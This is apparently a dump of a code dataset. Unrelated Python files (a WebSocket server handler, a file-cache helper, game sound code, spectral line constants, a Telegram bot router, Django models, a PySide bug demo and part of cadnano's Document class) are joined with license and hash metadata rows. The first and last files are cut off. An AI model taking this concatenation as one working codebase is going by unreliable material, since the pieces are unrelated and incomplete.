s = socket.socket(fa, socket.SOCK_STREAM)
if is_ipv6: s.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.set_socket(s)
self.bind(listen)
return self.fileno
def after(self):
self.listen(10)
self.register(self.fileno)
self.add_evt_read(self.fileno)
def tcp_accept(self):
while 1:
try:
cs, caddr = self.accept()
except BlockingIOError:
break
self.ws_accept(cs,caddr)
def ws_accept(self,cs,caddr):
"""重写这个方法
:param cs:客户端套接字对象
:param caddr:客户端地址
:return:
"""
pass
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def ws_release(self):
"""重写这个方法
:return:
"""
class ws_handler(tcp_handler.tcp_handler):
__conn_timeout = 60
__caddr = None
__encoder = None
__decoder = None
__is_handshake = None
__LOOP_TIMEOUT = 20
__update_time = 0
    # custom handshake response headers
__ext_handshake_resp_headers = None
__is_close = False
__is_sent_ping = False
def init_func(self, creator, cs, caddr):
self.__caddr = caddr
self.__decoder = websocket.decoder(server_side=True)
self.__encoder = websocket.encoder(server_side=True)
self.__is_handshake = False
self.__ext_handshake_resp_headers = []
self.__is_close = False
self.set_socket(cs)
self.register(self.fileno)
self.add_evt_read(self.fileno)
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
self.ws_init()
return self.fileno
def ws_init(self):
"""重写这个方法
:return:
"""
pass
@property
def caddr(self):
return self.__caddr
def response_error(self):
resp_sts = httputils.build_http1x_resp_header("400 Bad Request", [("Sec-WebSocket-Version", 13), ],
version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
self.delete_this_no_sent_data()
def __do_handshake(self, byte_data):
try:
sts = byte_data.decode("iso-8859-1")
except UnicodeDecodeError:
self.response_error()
return False
try:
rs = httputils.parse_htt1x_request_header(sts)
except:
self.response_error()
return False
req, headers = rs
dic = {}
for k, v in headers:
k = k.lower()
dic[k] = v
if "sec-websocket-key" not in dic: return False
ws_version = dic.get("sec-websocket-version", 0)
is_err = False
try:
ws_version = int(ws_version)
if ws_version != 13: is_err = True
except ValueError:
is_err = True
if is_err:
self.response_error()
return False
if not self.on_handshake(req, headers):
self.response_error()
return False
sec_ws_key = dic["sec-websocket-key"]
resp_sec_key = websocket.gen_handshake_key(sec_ws_key)
resp_headers = [("Upgrade", "websocket"), ("Connection", "Upgrade"), ("Sec-WebSocket-Accept", resp_sec_key)]
resp_headers += self.__ext_handshake_resp_headers
resp_sts = httputils.build_http1x_resp_header("101 Switching Protocols", resp_headers, version="1.1")
self.writer.write(resp_sts.encode("iso-8859-1"))
self.add_evt_write(self.fileno)
return True
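    # Illustrative sketch: websocket.gen_handshake_key() used above is assumed to
    # implement the RFC 6455 accept-key derivation shown here, i.e.
    # base64(sha1(Sec-WebSocket-Key + fixed GUID)). This helper is for reference only
    # and is not called by the handler.
    @staticmethod
    def _rfc6455_accept_key(sec_websocket_key):
        import base64
        import hashlib
        guid = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed GUID defined by RFC 6455
        digest = hashlib.sha1((sec_websocket_key + guid).encode("iso-8859-1")).digest()
        return base64.b64encode(digest).decode("ascii")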
def __handle_ping(self, message):
self.__send_pong(message)
def __handle_pong(self):
self.__is_sent_ping = False
self.__update_time = time.time()
def __handle_close(self):
if not self.__is_close:
self.ws_close()
return
self.delete_handler(self.fileno)
def __send_ping(self):
wrap_msg = self.__encoder.build_ping()
self.__is_sent_ping = True
self.__update_time = time.time()
self.writer.write(wrap_msg)
self.add_evt_write(self.fileno)
def __send_pong(self, message):
wrap_msg = self.__encoder.build_pong(message)
self.__update_time = time.time()
        self.writer.write(wrap_msg)
        self.add_evt_write(self.fileno)
def on_handshake(self, request, headers):
"""重写这个方法
:param request:
:param headers:
:return Boolean: False表示握手不允许,True表示握手允许
"""
return True
def set_handshake_resp_header(self, name, value):
"""设置额外的响应头
:param name:
:param value:
:return:
"""
self.__ext_handshake_resp_headers.append((name, value,))
def set_ws_timeout(self, timeout):
self.__conn_timeout = int(timeout)
if self.__conn_timeout < 1: raise ValueError("wrong timeout value")
def tcp_readable(self):
rdata = self.reader.read()
if not self.__is_handshake:
if not self.__do_handshake(rdata): return
self.__is_handshake = True
return
self.__decoder.input(rdata)
while self.__decoder.continue_parse():
self.__decoder.parse()
if not self.__decoder.can_read_data(): continue
data = self.__decoder.get_data()
self.__handle_readable(data, self.__decoder.fin, self.__decoder.rsv, self.__decoder.opcode,
self.__decoder.frame_ok())
if self.__decoder.frame_ok(): self.__decoder.reset()
self.__update_time = time.time()
return
def __handle_readable(self, message, fin, rsv, opcode, frame_finish):
"""
:param message:
:param fin:
:param rsv:
:param opcode:
:param frame_finish:
:return:
"""
if opcode == websocket.OP_CLOSE:
self.__handle_close()
return
if opcode == websocket.OP_PING:
self.__handle_ping(message)
return
if opcode == websocket.OP_PONG:
self.__handle_pong()
return
if not message: return
if message: self.ws_readable(message, fin, rsv, opcode, frame_finish)
def tcp_writable(self):
self.remove_evt_write(self.fileno)
def tcp_error(self):
self.delete_handler(self.fileno)
def tcp_delete(self):
self.ws_release()
self.unregister(self.fileno)
self.close()
def tcp_timeout(self):
if not self.__is_handshake:
self.delete_handler(self.fileno)
return
t = time.time()
if t - self.__update_time >= self.__conn_timeout:
if self.__is_close or self.__is_sent_ping:
self.delete_handler(self.fileno)
return
self.__send_ping()
self.set_timeout(self.fileno, self.__LOOP_TIMEOUT)
def sendmsg(self, msg, fin, rsv, opcode):
"""发送websocket消息
:param msg:
:return:
"""
if opcode in (0x8, 0x9, 0xa,): raise ValueError("ping,pong,close frame cannot be sent by this function")
if self.__is_close: raise ValueError("the connection is closed,you should not send data")
self.__update_time = time.time()
wrap_msg = self.__encoder.build_frame(msg, fin, rsv, opcode)
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
def ws_readable(self, message, fin, rsv, opcode, frame_finish):
"""重写这个方法
:param message:
:param fin:
:param rsv:
:param opcode:
:param is_finish:
:return:
"""
pass
def ws_close(self, code=None):
"""关闭ws连接
:return:
"""
if not code:
code = ""
else:
code = str(code)
wrap_msg = self.__encoder.build_close(code.encode("iso-8859-1"))
self.__is_close = True
self.add_evt_write(self.fileno)
self.writer.write(wrap_msg)
self.__update_time = time.time()
self.delete_this_no_sent_data()
def ws_release(self):
"""重写这个方法
:return:
"""
pass | bsd-2-clause | -8,273,594,278,908,964,000 | 25.149254 | 116 | 0.545953 | false | 3.66946 | false | false | false |
broomyocymru/ditto | ditto/core/cache.py | 1 | 1389 | import glob
import os
import shutil
import uuid
from os.path import expanduser
import requests
from ditto.core import logger
def setup():
global session_uuid
session_uuid = str(uuid.uuid1())
def cleanup():
shutil.rmtree(get_cache_dir(), True)
def get_session_uuid():
return session_uuid
def get_file(file_path):
if file_path.startswith('http'):
fname = file_path.split('/')[-1]
if not os.path.exists(get_cache_dir()):
os.makedirs(get_cache_dir())
local_path = os.path.abspath(get_cache_dir() + '/' + fname)
r = requests.get(file_path, stream=True)
if r.status_code == 200:
with open(local_path, 'wb') as f:
shutil.copyfileobj(r.raw, f)
del r
else:
logger.error("Download failed (" + file_path + ")")
file_path = local_path
else:
file_paths = glob.glob(file_path)
if len(file_paths) > 1:
logger.warn("More than 1 file found, taking first")
if len(file_paths) == 0:
logger.error("File not found (" + file_path + ")")
file_path = os.path.abspath(file_paths[0])
return file_path
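# Usage sketch (illustrative only; the URL, the glob pattern and the function name are
# made up): remote files are downloaded into the per-user cache directory, while local
# arguments are treated as glob patterns and resolved to a single match.
def _get_file_examples():
    downloaded = get_file('http://example.com/artifacts/build.zip')
    local = get_file('./configs/*.yml')
    return downloaded, local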
def get_cache_dir():
cache_dir = os.path.abspath(os.path.join(expanduser("~"), ".ditto_cache"))
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
return cache_dir | mit | -2,744,009,419,647,377,400 | 21.419355 | 78 | 0.587473 | false | 3.481203 | false | false | false |
jemofthewest/GalaxyMage | src/Sound.py | 1 | 2427 | # Copyright (C) 2005 Colin McMillen <[email protected]>
#
# This file is part of GalaxyMage.
#
# GalaxyMage is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# GalaxyMage is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GalaxyMage; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
# You may import this module only after the pygame mixer module has
# been initialized.
import Resources
import pygame
_quiet = False
_mixerInit = pygame.mixer.get_init() != None
if _mixerInit:
_cursorChannel = pygame.mixer.Channel(0)
_actionChannel = pygame.mixer.Channel(1)
else:
_quiet = True
_cursorChannel = None
_actionChannel = None
def _play(channel, sound):
if not _mixerInit:
return
if not _quiet and sound != None:
channel.play(sound)
def setQuiet(quiet):
global _quiet
if not _mixerInit:
return
_quiet = quiet
if _quiet:
pygame.mixer.pause()
pygame.mixer.music.pause()
else:
pygame.mixer.unpause()
pygame.mixer.music.unpause()
def toggleQuiet():
setQuiet(not _quiet)
def playMusic(musicName):
"""Changes background music."""
if not _mixerInit:
return
if not _quiet:
Resources.music(musicName)
def playTune(tuneName):
"""Plays a short tune. Returns whether it was actually played."""
if _mixerInit and not _quiet:
Resources.music(tuneName, loop=False)
return True
else:
return False
def cursorClick():
s = Resources.sound("cursor-click")
_play(_cursorChannel, s)
def cursorCancel():
s = Resources.sound("cursor-cancel")
_play(_cursorChannel, s)
def cursorMove():
s = Resources.sound("cursor-move")
_play(_cursorChannel, s)
def cursorInvalid():
s = Resources.sound("cursor-invalid")
_play(_cursorChannel, s)
def action(sound):
s = Resources.sound(sound)
_play(_actionChannel, s)
| gpl-2.0 | -3,338,352,428,866,749,400 | 23.765306 | 70 | 0.679852 | false | 3.574374 | false | false | false |
JohanComparat/pySU | galaxy/python/lineListAir.py | 1 | 4082 | """
Script loading the atomic properties from the pyNEB package.
Mostly line transitions.
Input to the line fitting procedures
"""
import numpy as n
from scipy.interpolate import interp1d
import pyneb as pn
# Conversion from Morton (1991, ApJS, 77, 119) wavelength in Angstrom
# SDSS spectra are in the vacuum, therefore the ref wavelengths of the lines must be in the vacuum.
AIR = lambda VAC : VAC / (1.0 + 2.735182e-4 + 131.4182 / VAC**2 + 2.76249e8 / VAC**4)
vacs=n.arange(1000,12000,0.01)
airs=AIR(vacs)
VAC = interp1d(airs,vacs)
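# Quick sanity check (illustrative): AIR converts vacuum to air wavelengths and VAC
# inverts it by interpolation, so a round trip should agree to well below 0.01 A.
# The wavelength below is just an example value inside the sampled range.
_example_vac = 5000.0
assert abs(VAC(AIR(_example_vac)) - _example_vac) < 1e-2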
# Wavelengths from pyNeb Atoms are in A in vacuum like the SDSS spectra. No need to convert.
C3 = pn.Atom('C', 3)
#C3.printIonic()
C3_1908=AIR(1/(C3.getEnergy(C3.getTransition(1908)[0])-C3.getEnergy(C3.getTransition(1908)[1])))
C4 = pn.Atom('C', 4)
#C4.printIonic()
C4_1548=AIR(1/(C4.getEnergy(C4.getTransition(1548)[0])-C4.getEnergy(C4.getTransition(1548)[1])))
O2 = pn.Atom('O', 2)
#O2.printIonic()
O2_3727=AIR(1/(O2.getEnergy(O2.getTransition(3727)[0])-O2.getEnergy(O2.getTransition(3727)[1])))
O2_3729=AIR(1/(O2.getEnergy(O2.getTransition(3729)[0])-O2.getEnergy(O2.getTransition(3729)[1])))
#O2=AIR((O2_3727+O2_3729)/2.)
O2_mean=(O2_3727*3.326568+O2_3729*3.324086)/(3.326568 + 3.324086)
Ne3 = pn.Atom('Ne',3)
#Ne3.printIonic()
Ne3_3869=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3869)[0])-Ne3.getEnergy(Ne3.getTransition(3869)[1])))
Ne3_3968=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3968)[0])-Ne3.getEnergy(Ne3.getTransition(3968)[1])))
O3 = pn.Atom('O', 3)
#O3.printIonic()
O3_4363=AIR(1/(O3.getEnergy(O3.getTransition(4363)[0])-O3.getEnergy(O3.getTransition(4363)[1])))
O3_4960=AIR(1/(O3.getEnergy(O3.getTransition(4960)[0])-O3.getEnergy(O3.getTransition(4960)[1])))
O3_5007=AIR(1/(O3.getEnergy(O3.getTransition(5007)[0])-O3.getEnergy(O3.getTransition(5007)[1])))
O1 = pn.Atom('O', 1)
O1_5578=AIR(1/(O1.getEnergy(O1.getTransition(5578)[0])-O1.getEnergy(O1.getTransition(5578)[1])))
O1_6302=AIR(1/(O1.getEnergy(O1.getTransition(6302)[0])-O1.getEnergy(O1.getTransition(6302)[1])))
O1_6365=AIR(1/(O1.getEnergy(O1.getTransition(6365)[0])-O1.getEnergy(O1.getTransition(6365)[1])))
N2 = pn.Atom('N', 2)
#N2.printIonic()
N2_5756=AIR(1/(N2.getEnergy(N2.getTransition(5756)[0])-N2.getEnergy(N2.getTransition(5756)[1])))
N2_6549=AIR(1/(N2.getEnergy(N2.getTransition(6549)[0])-N2.getEnergy(N2.getTransition(6549)[1])))
N2_6585=AIR(1/(N2.getEnergy(N2.getTransition(6585)[0])-N2.getEnergy(N2.getTransition(6585)[1])))
S2 = pn.Atom('S', 2)
#S2.printIonic()
S2_6718=AIR(1/(S2.getEnergy(S2.getTransition(6718)[0])-S2.getEnergy(S2.getTransition(6718)[1])))
S2_6732=AIR(1/(S2.getEnergy(S2.getTransition(6732)[0])-S2.getEnergy(S2.getTransition(6732)[1])))
Ar3 = pn.Atom('Ar', 3)
#Ar3.printIonic()
Ar3_7137=AIR(1/(Ar3.getEnergy(Ar3.getTransition(7137)[0])-Ar3.getEnergy(Ar3.getTransition(7137)[1])))
# Wavelengths from pyNeb RecAtoms are in A in Air like the SDSS spectra. Conversion needed.
H1=pn.RecAtom('H',1) # Hydrogen Balmer series
H1_3970=H1.getWave(7,2)
H1_4102=H1.getWave(6,2)
H1_4341=H1.getWave(5,2)
H1_4862=H1.getWave(4,2)
H1_6564=H1.getWave(3,2)
H1=pn.RecAtom('H',1) # Hydrogen Lyman series
H1_1216=H1.getWave(2,1)
He1=pn.RecAtom('He',1) # Helium
He2=pn.RecAtom('He',2) # Helium
He2_4686=He2.getWave(4,3)
He2_5411=He2.getWave(7,4)
# Limits for the 4000 A fit
#dl4k=150
#intLim4k=n.array([3950-dl4k, 3950, 4050, 4050+dl4k])
#intLim4k=n.array([3600-dl4k, 3600, 4140, 4140+dl4k])
# limits for the UV luminosity fits
#intLimUV=n.array([2000,2200,3000,3200,3400,3600,4100,4300,4500,4700])
# system at 2360
# cmin1,cmax1=2080.,2240.
#em1=2326.7
#abs1=2343.7
#em2=2365.3
#aTR=2370.
#abs2=2374.3
#abs3=2382.2
#em3=2396.2
# cmin2,cmax2=2400.,2550.
#a0s2360=n.array([em1,abs1,em2,abs2,abs3,em3])
# system at 2600
#em1=2586.1
#em2=2599.6
#aTR=2606.
#abs1=2612.5
#abs2=2626.3
#cmin1,cmax1=2400.,2550.
#cmin2,cmax2=2650.,2770.
#a0s2600=n.array([em1,em2,abs1,abs2])
# system at 2800
#Mga=2795.
#Mgb=2802.
#aTR=2798.
#cmin1,cmax1=2650.,2770.
#cmin2,cmax2=2807., 2840.
#a0s2800=n.array([Mga,Mgb])
# abs2852=3851.9
# cmin2,cmax2=2870.,3000.
| cc0-1.0 | -7,262,391,922,114,196,000 | 31.141732 | 101 | 0.715091 | false | 2 | false | false | false |
JulyJ/MindBot | mindbot/router.py | 1 | 2824 | """
Module designed to route messages based on strategy pattern.
This module includes a command-to-class mapper tuple that correlates commands
received from Telegram users with the target command class to run. Additionally,
this module generates the help message based on the command list.
"""
from typing import Any, Dict
from .command.help.commands import GreetingsCommand, HelpCommand
from .command.nasa.apod import APODCommand
from .command.nasa.asteroid import AsteroidCommand
from .command.nasa.curiosity import CuriosityCommand
from .command.search.google import GoogleCommand
from .command.search.wiki import WikiCommand, RandomCommand
from .command.search.urban import UrbanDictionaryCommand
from .command.search.dictionary import DictionaryCommand
from .command.weather.weather import WeatherCommand
from .command.weather.forecast import ForecastCommand
from .command.exchange.exchange import ExchangeCommand
from .command.remember.rememberall import RememberAll
from .command.remember.searchtag import SearchTagCommand
from .command.comics.xkcd import XkcdCommand
from .command.tools.qrgenerator import QrCommand
from .command.tools.ocr import OcrCommand
from .command.news.hackernews import LatestNewsCommand, TopNewsCommand, BestNewsCommand
from .command.news.canadanews import CanadaStatsCommand
class CommandRouter:
command_class_mapper = (
('/help', HelpCommand),
('/asteroid', AsteroidCommand),
('/start', GreetingsCommand),
('/canadastat', CanadaStatsCommand),
('/oxford', DictionaryCommand),
('/exchange', ExchangeCommand),
('/forecast', ForecastCommand),
('/google', GoogleCommand),
('/search', SearchTagCommand),
('/urban', UrbanDictionaryCommand),
('/weather', WeatherCommand),
('/curiosity', CuriosityCommand),
('/qr', QrCommand),
('/ocr', OcrCommand),
('/apod', APODCommand),
('/wiki', WikiCommand),
('/random', RandomCommand),
('/xkcd', XkcdCommand),
('/latestnews', LatestNewsCommand),
('/topnews', TopNewsCommand),
('/bestnews', BestNewsCommand),
('/remember', RememberAll),
)
@classmethod
def route(cls, message: Dict[str, Any]):
command, _, query = message['text'].partition(' ')
command = command.lower()
if command not in dict(cls.command_class_mapper):
return
command_class = dict(cls.command_class_mapper).get(command, None)
command_instance = command_class(cls, query, message)
return command_instance()
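    # Dispatch sketch (assumes the message dict shape used above, i.e. a 'text' key
    # holding the raw command string):
    #
    #     message = {'text': '/weather london'}
    #     CommandRouter.route(message)
    #     # -> command '/weather', query 'london', runs WeatherCommand(cls, 'london', message)()
    #
    # Unknown commands fall through and route() returns None.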
@classmethod
def get_commands_help(cls):
return (
(command, command_class.help_text)
for command, command_class in cls.command_class_mapper
if command_class.help_text is not None
)
| mit | -6,548,554,171,890,835,000 | 37.684932 | 87 | 0.695467 | false | 4.116618 | false | false | false |
althalus/knotcrafters | knotdirectory/knotdirectory/knots/models.py | 1 | 2886 | from django.db import models
from taggit.managers import TaggableManager
from django.core.urlresolvers import reverse
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import get_user_model
User = get_user_model()
class Knot(models.Model):
name = models.CharField(max_length=90, help_text="Commonly accepted name for this tie")
other_names = models.TextField(help_text="Is this knot known by other names? One name per line, please", blank=True)
creator_name = models.CharField(max_length=90, help_text="Who should we credit for discovering this tie")
creator = models.ForeignKey('CreatorProfile', blank=True, null=True, editable=False)
notes = models.TextField(help_text="Any other information? Markdown text enabled.", blank=True)
tags = TaggableManager()
date_added = models.DateTimeField(auto_now_add=True)
date_updated = models.DateTimeField(auto_now=True)
photo = models.ImageField(upload_to="knotsimages/%Y/%m/", help_text="A photo of the completed tie.")
def save(self):
if not self.creator:
try:
self.creator = CreatorProfile.objects.get(name=self.creator_name)
except CreatorProfile.DoesNotExist:
cp = CreatorProfile()
cp.name = self.creator_name
cp.save()
self.creator = cp
super(Knot, self).save()
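    # The save() override above is equivalent to the sketch below; get_or_create would
    # collapse the try/except into one call (shown only as a design note, assuming
    # CreatorProfile.name stays unique enough for this lookup):
    #
    #     self.creator, _ = CreatorProfile.objects.get_or_create(name=self.creator_name)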
def get_absolute_url(self):
return reverse("knots.detail", args=[self.pk, ])
def __unicode__(self):
return u'%s' % self.name
class Link(models.Model):
knot = models.ForeignKey(Knot)
link = models.URLField(help_text="Link ot the guide")
name = models.CharField(max_length=90, help_text="A descriptive name for this guide")
def __unicode__(self):
return u'Link %s on knot %s' % (self.name, self.knot.name)
class Action(models.Model):
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = generic.GenericForeignKey('content_type', 'object_id')
user = models.ForeignKey(User)
when = models.DateTimeField(auto_now=True)
what = models.TextField()
def __unicode__(self):
return u'%s: %s %s %s' % (self.when, self.user, self.what, self.content_object)
class CreatorProfile(models.Model):
name = models.CharField(max_length=90)
link_facebook_profile = models.URLField(blank=True)
link_youtube_channel = models.URLField(blank=True)
link_website = models.URLField(blank=True)
email = models.EmailField(blank=True)
user = models.ForeignKey(User, blank=True, null=True)
bio = models.TextField(blank=True, null=True)
def __unicode__(self):
return u'%s' % self.name
def get_absolute_url(self):
return reverse("creators.detail", args=[self.pk, ])
| mit | -6,894,886,796,592,600,000 | 37.48 | 120 | 0.682259 | false | 3.714286 | false | false | false |
LogikSim/LogikSimPython | src/debug/pyside_bugs/nonimplemented_virtual_methods.py | 1 | 1739 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Copyright 2014 The LogikSim Authors. All rights reserved.
Use of this source code is governed by the GNU GPL license that can
be found in the LICENSE.txt file.
Nonimplemented virtual methods can lead to event handling Problems.
Run the script as it is and you will observe the following issues:
- The frame cannot be closed normally; it can only be closed by killing the process
- Resizing the program leads to strange error messages:
QPainter::begin: Paint device returned engine == 0, type: 0
Proposed changes:
- Detect unresolvable virtual methods and print appropriate error message
Workaround for this example:
Uncomment:
def sizeHint(self, *args):
return self.rect().size()
"""
import sys
from PySide import QtGui
class TestRect(QtGui.QGraphicsRectItem, QtGui.QGraphicsLayoutItem):
def __init__(self, *args, **kargs):
QtGui.QGraphicsRectItem.__init__(self, *args, **kargs)
QtGui.QGraphicsLayoutItem.__init__(self, *args, **kargs)
self.setRect(0, 0, 200, 100)
def setGeometry(self, rect):
self.setRect(rect)
# def sizeHint(self, *args):
# return self.rect().size()
def add_rect_with_layout(scene):
item1 = TestRect()
item2 = TestRect()
scene.addItem(item1)
scene.addItem(item2)
layout = QtGui.QGraphicsGridLayout()
layout.addItem(item1, 0, 0)
layout.addItem(item2, 0, 1)
form = QtGui.QGraphicsWidget()
form.setLayout(layout)
scene.addItem(form)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
add_rect_with_layout(scene)
view = QtGui.QGraphicsView()
view.setScene(scene)
view.show()
app.exec_()
| gpl-3.0 | 7,154,451,987,703,996,000 | 22.186667 | 77 | 0.677976 | false | 3.570842 | false | false | false |
JMMolenaar/cadnano2.5 | cadnano/document.py | 1 | 19668 | #!/usr/bin/env python
# encoding: utf-8
from operator import itemgetter
import cadnano.util as util
import cadnano.preferences as prefs
from cadnano.cnproxy import ProxyObject, ProxySignal
from cadnano.cnproxy import UndoStack, UndoCommand
from cadnano.strand import Strand
from cadnano.oligo import Oligo
from cadnano.strandset import StrandSet
from cadnano.virtualhelix import VirtualHelix
from cadnano.part import Part
from cadnano.part import HoneycombPart
from cadnano.part import SquarePart
from cadnano import app
class Document(ProxyObject):
"""
The Document class is the root of the model. It has two main purposes:
    1. Serve as the parent of all Part objects within the model.
2. Track all sub-model actions on its undoStack.
"""
def __init__(self, parent=None):
super(Document, self).__init__(parent)
self._undostack = UndoStack()
self._parts = []
self._assemblies = []
self._controller = None
self._selected_part = None
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
app().documentWasCreatedSignal.emit(self)
# end def
### SIGNALS ###
documentPartAddedSignal = ProxySignal(object,
ProxyObject,
name='documentPartAddedSignal') # doc, part
# dict of tuples of objects using the reference as the key,
# and the value is a tuple with meta data
# in the case of strands the metadata would be which endpoints of selected
# e.g. { objectRef: (value0, value1), ...}
documentSelectedChangedSignal = ProxySignal(dict,
name='documentSelectedChangedSignal') # tuples of items + data
documentSelectionFilterChangedSignal = ProxySignal(list,
name='documentSelectionFilterChangedSignal')
documentViewResetSignal = ProxySignal(ProxyObject,
name='documentViewResetSignal')
documentClearSelectionsSignal = ProxySignal(ProxyObject,
name='documentClearSelectionsSignal')
### SLOTS ###
### ACCESSORS ###
def undoStack(self):
"""
This is the actual undoStack to use for all commands. Any children
needing to perform commands should just ask their parent for the
undoStack, and eventually the request will get here.
"""
return self._undostack
def parts(self):
"""Returns a list of parts associated with the document."""
return self._parts
def assemblies(self):
"""Returns a list of assemblies associated with the document."""
return self._assemblies
### PUBLIC METHODS FOR QUERYING THE MODEL ###
def selectedPart(self):
return self._selected_part
def addToSelection(self, obj, value):
self._selection_dict[obj] = value
self._selected_changed_dict[obj] = value
# end def
def removeFromSelection(self, obj):
if obj in self._selection_dict:
del self._selection_dict[obj]
self._selected_changed_dict[obj] = (False, False)
return True
else:
return False
# end def
def clearSelections(self):
"""
Only clear the dictionary
"""
self._selection_dict = {}
# end def
def addStrandToSelection(self, strand, value):
ss = strand.strandSet()
if ss in self._selection_dict:
self._selection_dict[ss][strand] = value
else:
self._selection_dict[ss] = {strand: value}
self._selected_changed_dict[strand] = value
# end def
def removeStrandFromSelection(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
temp = self._selection_dict[ss]
if strand in temp:
del temp[strand]
if len(temp) == 0:
del self._selection_dict[ss]
self._selected_changed_dict[strand] = (False, False)
return True
else:
return False
else:
return False
# end def
def selectionDict(self):
return self._selection_dict
# end def
def selectedOligos(self):
"""
        If at least one endpoint of a strand is in the selection, the whole oligo
        is considered selected.
"""
s_dict = self._selection_dict
selected_oligos = set()
for ss in s_dict.keys():
for strand in ss:
selected_oligos.add(strand.oligo())
# end for
# end for
return selected_oligos if len(selected_oligos) > 0 else None
#end def
def clearAllSelected(self):
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentClearSelectionsSignal.emit(self)
# end def
def isModelSelected(self, obj):
return obj in self._selection_dict
# end def
def isModelStrandSelected(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
if strand in self._selection_dict[ss]:
return True
else:
return False
else:
return False
# end def
def getSelectedValue(self, obj):
"""
obj is an objects to look up
it is prevetted to be in the dictionary
"""
return self._selection_dict[obj]
def getSelectedStrandValue(self, strand):
"""
strand is an objects to look up
it is prevetted to be in the dictionary
"""
return self._selection_dict[strand.strandSet()][strand]
# end def
def sortedSelectedStrands(self, strandset):
# outList = self._selection_dict[strandset].keys()
# outList.sort(key=Strand.lowIdx)
out_list = [x for x in self._selection_dict[strandset].items()]
getLowIdx = lambda x: Strand.lowIdx(itemgetter(0)(x))
out_list.sort(key=getLowIdx)
return out_list
# end def
def determineStrandSetBounds(self, selected_strand_list, strandset):
min_low_delta = strandset.partMaxBaseIdx()
min_high_delta = strandset.partMaxBaseIdx() # init the return values
ss_dict = self._selection_dict[strandset]
# get the StrandSet index of the first item in the list
ss_idx = strandset._findIndexOfRangeFor(selected_strand_list[0][0])[2]
ss_list = strandset._strand_list
len_ss_list = len(ss_list)
max_ss_idx = len_ss_list - 1
i = 0
for strand, value in selected_strand_list:
while strand != ss_list[ss_idx]:
# incase there are gaps due to double xovers
ss_idx += 1
# end while
idxL, idxH = strand.idxs()
if value[0]: # the end is selected
if ss_idx > 0:
low_neighbor = ss_list[ss_idx - 1]
if low_neighbor in ss_dict:
valueN = ss_dict[low_neighbor]
# we only care if the low neighbor is not selected
temp = min_low_delta if valueN[1] \
else idxL - low_neighbor.highIdx() - 1
# end if
else: # not selected
temp = idxL - low_neighbor.highIdx() - 1
# end else
else:
temp = idxL - 0
# end else
if temp < min_low_delta:
min_low_delta = temp
# end if
# check the other end of the strand
if not value[1]:
temp = idxH - idxL - 1
if temp < min_high_delta:
min_high_delta = temp
# end if
if value[1]:
if ss_idx < max_ss_idx:
high_neighbor = ss_list[ss_idx + 1]
if high_neighbor in ss_dict:
valueN = ss_dict[high_neighbor]
# we only care if the low neighbor is not selected
temp = min_high_delta if valueN[0] \
else high_neighbor.lowIdx() - idxH - 1
# end if
else: # not selected
temp = high_neighbor.lowIdx() - idxH - 1
# end else
else:
temp = strandset.partMaxBaseIdx() - idxH
# end else
if temp < min_high_delta:
min_high_delta = temp
# end if
# check the other end of the strand
if not value[0]:
temp = idxH - idxL - 1
if temp < min_low_delta:
min_low_delta = temp
# end if
# increment counter
ss_idx += 1
# end for
return (min_low_delta, min_high_delta)
# end def
def getSelectionBounds(self):
min_low_delta = -1
min_high_delta = -1
for strandset in self._selection_dict.keys():
selected_list = self.sortedSelectedStrands(strandset)
temp_low, temp_high = self.determineStrandSetBounds(
selected_list, strandset)
if temp_low < min_low_delta or min_low_delta < 0:
min_low_delta = temp_low
if temp_high < min_high_delta or min_high_delta < 0:
min_high_delta = temp_high
            # end for
return (min_low_delta, min_high_delta)
# end def
# def operateOnStrandSelection(self, method, arg, both=False):
# pass
# # end def
def deleteSelection(self, use_undostack=True):
"""
Delete selected strands. First iterates through all selected strands
and extracts refs to xovers and strands. Next, calls removeXover
on xoverlist as part of its own macroed command for isoluation
purposes. Finally, calls removeStrand on all strands that were
fully selected (low and high), or had at least one non-xover
endpoint selected.
"""
xoList = []
strand_dict = {}
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
strand5p = strand.connection5p()
strand3p = strand.connection3p()
# both ends are selected
strand_dict[strand] = selected[0] and selected[1]
# only look at 3' ends to handle xover deletion
sel3p = selected[0] if idxL == strand.idx3Prime() else selected[1]
if sel3p: # is idx3p selected?
if strand3p: # is there an xover
xoList.append((part, strand, strand3p, use_undostack))
else: # idx3p is a selected endpoint
strand_dict[strand] = True
else:
if not strand5p: # idx5p is a selected endpoint
strand_dict[strand] = True
if use_undostack and xoList:
self.undoStack().beginMacro("Delete xovers")
for part, strand, strand3p, useUndo in xoList:
Part.removeXover(part, strand, strand3p, useUndo)
self.removeStrandFromSelection(strand)
self.removeStrandFromSelection(strand3p)
self._selection_dict = {}
self.documentClearSelectionsSignal.emit(self)
if use_undostack:
if xoList: # end xover macro if it was started
self.undoStack().endMacro()
if True in strand_dict.values():
